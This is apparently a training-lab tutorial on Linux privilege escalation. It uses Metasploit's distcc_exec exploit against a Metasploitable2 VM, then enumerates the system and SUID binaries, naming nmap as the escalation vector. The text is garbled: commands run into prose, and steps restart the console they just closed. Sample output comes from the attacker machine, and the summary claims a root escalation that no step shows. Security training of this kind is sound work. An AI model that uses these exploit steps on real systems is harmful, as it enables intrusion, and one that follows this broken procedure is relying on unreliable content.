In this lab, you will learn how to perform privilege escalation on a Linux machine after successfully gaining access as a non-root user. While there are many tutorials available online for Windows privilege escalation, this lab focuses specifically on escalating privileges on a Linux operating system.
In this step, we will start the necessary components of the lab environment, including the Kali Linux container and the Metasploitable2 virtual machine.
sudo virsh start Metasploitable2target hostname:ping 192.168.122.102Press Ctrl+C to stop the ping.
docker run -ti --network host b5b709a49cd5 bashtarget hostname:ping 192.168.122.102Press Ctrl+C to stop the ping.
In this step, we will use the Metasploit Framework (MSF) in the Kali container to gain initial access to the Metasploitable2 target machine.
cd ~
msfconsoledistcc_exec exploit module:use exploit/unix/misc/distcc_execset RHOST 192.168.122.102exploitAfter a successful exploitation, you should see a command shell session opened, indicating that you have gained access to the target machine.
Press Ctrl+D to quit the Metasploit console then start the inspection
After gaining initial access, we need to check the privileges of the current user to determine if further privilege escalation is required.
cd ~
msfconsolewhoamiidIf the user ID is not 0 (root), you will need to escalate privileges to gain administrative access.
Press Ctrl+D to quit the Metasploit console then start the inspection
Before attempting privilege escalation, we need to gather information about the target system to identify potential vulnerabilities.
cd ~
msfconsolelsb_release -aHere's an example of the output you might see:
[*] exec: lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2023.2
Codename: kali-rollinguname -aHere's an example of the output you might see:
Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linuxfind / -perm -u=s -type f 2>/dev/nullIn the output, you should see the /usr/bin/nmap binary, which has a known privilege escalation vulnerability in older versions, press Ctrl+C to exit.
Press Ctrl+D to quit the Metasploit console then start the inspection
In this lab, you learned how to perform privilege escalation on a Linux machine after gaining initial access as a non-root user. We started by setting up the LabEx environment with the Kali Linux container and the Metasploitable2 virtual machine. We then used the Metasploit Framework to exploit the Distcc vulnerability and gain initial access to the target machine.
After verifying that we were not a root user, we gathered information about the target system, such as the Linux distribution version, kernel version, and SUID files. We identified the Nmap binary as a potential vulnerability and exploited it to escalate our privileges to root.
By completing this lab, you gained hands-on experience with the process of privilege escalation on Linux systems, which is a critical skill in the field of cybersecurity. You also learned how to use various Linux commands for system enumeration and exploitation, as well as how to leverage vulnerabilities in software to gain elevated access.